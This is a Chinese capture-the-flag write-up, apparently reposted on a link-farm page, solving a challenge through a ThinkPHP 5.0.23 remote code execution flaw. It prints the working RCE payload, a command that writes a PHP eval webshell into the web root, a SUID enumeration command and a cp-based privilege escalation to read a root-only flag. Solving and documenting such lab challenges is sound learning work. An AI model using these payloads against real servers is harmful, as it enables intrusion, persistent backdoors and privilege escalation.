当前位置: 首页 > news >正文

网站静态页面360广告推广平台

网站静态页面,360广告推广平台,手机如何创建网页链接,做网站设计赚不赚钱前言:比赛是结束了,但我的学习还未结束,看看自己能复习几道题吧,第四周实在太难 Final 考点: ThinkPHP 5.0.23 RCE一句话木马上传SUID提权(find) 解题: 首先页面就给了ThinkPHP V5, 那无非考…

 前言:比赛是结束了,但我的学习还未结束,看看自己能复习几道题吧,第四周实在太难

Final

考点:

ThinkPHP 5.0.23 RCE+一句话木马上传+SUID提权(find)

 解题:

首先页面就给了ThinkPHP V5, 那无非考的就是ThinkPHP版本的漏洞 ,经过信息收集发现确实是ThinkPHP 5.0.23漏洞 下篇文章即有现成的讲解:

https://blog.csdn.net/Lucky1youzi/article/details/128740552

我们按照他说的做,首先抓包进行传参

GET:index.php?s=captcha
POST:_method=__construct&filter[]=phpinfo&method=get&server[REQUEST_METHOD]=1

 这个参数1 是可以进行修改的,竟然能出现phpinfo页面 ,那我们就可以进行RCE,但是我们发现命令执行参数全被ban了,可能是权限的问题 ,我们上传一句话木马

_method=__construct&filter[]=exec&method=get&server[REQUEST_METHOD]=echo%20'<?php%20eval($_POST['cmd']);?>'%20>%20/var/www/public/1.php

然后蚁剑连接后发现根目录下存在flag文件

但是里面内容没有 ,一眼没权限,我们去终端看看

我们发现 -rwx-----意思就是只能文件主的权限使用 意思就是最高权限才能读

尝试chmod无果

然后我们这里就查看具有SUID权限的命令:

find / -user root -perm -4000 -print 2>/dev/null

这个利用find进行提权可以访问

https://blog.csdn.net/rlenew/article/details/111873682

 

我们使用cp命令SUID提权读取Flag:

cp /flag_dd3f6380aa0d /dev/stdout

 / dev / stdout是—个特殊的文件,代表标准输出。

http://www.yidumall.com/news/75263.html

相关文章:

  • 网站主题页广告公司取名字参考大全
  • 网站怎样做银联支付接口网站推广怎么弄
  • php mysql怎么编写视频网站韩国最新新闻
  • php网站 怎么做授权网站排行
  • 找人做海报在什么网站找网络营销策略制定
  • 维护一个网站难吗公司网站模板设计
  • 网页制作图片怎么居中小果seo实战培训课程
  • 怎么做网站的搜索引擎引流推广是什么意思
  • 做医疗网站百度最新版app下载安装
  • 网站开发功能百度精准搜索
  • 贵阳网站开发培训学费搜狗网址大全
  • 怎么做网站的一个横向列表百度一下电脑版首页网址
  • vuejs做视频网站湖南专业关键词优化
  • 企业网站备案后可否更改名称win7优化大师官方免费下载
  • 福州最好的网站建设广州seo排名优化
  • 全国建设工程信息网站查收录网站
  • 了解网站开发 后台流程广告联盟app
  • 建设网站有哪些全网搜索软件
  • 国外看新闻app推荐企业网站seo优化外包
  • 汽车城网站建设方案百度直播推广
  • 宿州建设银行网站网络媒体软文案例
  • 湛江做网站公司优化怎么做
  • 看课学校网站建设旅行网站排名前十名
  • 制作返利网站seo优化网站技术排名百度推广
  • wordpress情侣家园seo快速排名网站优化
  • 衡水做外贸网站建设我赢网提供的高水平网页设计师
  • 老板让做公司网站设计拉新app渠道
  • 网站需备案吗网络销售就是忽悠人
  • 电商平台规则中国十大seo公司
  • 做推广优化的网站有哪些线上营销方式6种